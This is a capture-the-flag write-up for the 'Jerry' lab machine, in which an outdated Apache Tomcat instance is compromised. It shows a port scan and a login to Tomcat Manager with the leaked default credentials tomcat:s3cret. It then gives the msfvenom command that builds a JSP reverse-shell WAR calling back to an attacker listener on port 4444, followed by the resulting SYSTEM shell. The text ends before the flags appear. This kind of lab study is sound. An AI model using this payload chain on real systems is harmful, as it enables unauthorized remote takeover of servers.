Jerry
Jerry is a straightforward Windows machine running an outdated Apache Tomcat instance. The attack path involves authenticating to the Tomcat Manager with default credentials, deploying a malicious WAR file for remote code execution, and landing directly as NT AUTHORITY\SYSTEM - no privilege escalation required.
Attack Chain
1
2
3
4
5
Nmap → Port 8080 (Tomcat 7.0.88)
→ /manager/html → 403 leaks default creds (tomcat:s3cret)
→ Manager access → WAR file upload
→ JSP reverse shell → RCE as NT AUTHORITY\SYSTEM
→ C:\Users\Administrator\Desktop\flags\ → user + root flags
Reconnaissance
Starting with a full port scan:
1
2
3
4
5
6
7
8
9
10
11
Nmap scan report for 10.129.136.9
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2026-06-11 19:53:15 EAT for 378s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
Only one port is identified as open (8080) running Apache Tomcat 7.0.88 on Windows Server 2012 R2.
Navigating to http://10.129.136.9:8080 confirms the default Tomcat welcome page.
Clicking Manager App redirects to /manager/html which returns a 403 Access Denied but crucially, the error page itself leaks a hint in the example config:
Foothold - Tomcat Manager Access
Navigating to http://10.129.136.9:8080/manager/html triggers HTTP Basic Auth. Using the credentials leaked in the 403 page:
1
2
Username: tomcat
Password: s3cret
Access granted to the Tomcat Web Application Manager.
Exploitation - Malicious WAR Deployment
With manager access, the path to RCE is deploying a malicious .war file (a Java web application archive). Generate a JSP reverse shell payload using msfvenom as follows:
1
2
3
4
➜ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.192 LPORT=4444 -f war -o shell.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes
Saved as: shell.war
In the Manager UI under WAR file to deploy:
- Browse –> select
shell.war - Click Deploy
The application appears in the list as /shell with status Running.
Set up the listener:
1
2
3
➜ listen
[*] Listening on 10.10.15.192:4444
listening on [any] 4444 ...
Trigger the shell by browsing to (http://10.129.136.9:8080/shell/) :
Shell & Flags
Connection received:
1
2
3
4
5
6
7
8
9
10
11
12
➜ listen
[*] Listening on 10.10.15.192:4444
listening on [any] 4444 ...
connect to [10.10.15.192] from (UNKNOWN) [10.129.136.9] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>
This landed directly as SYSTEM, indicating Tomcat was running with the highest privilege level on the box, so no privesc needed.
Navigate to the flags directory. Both flags are in a single file: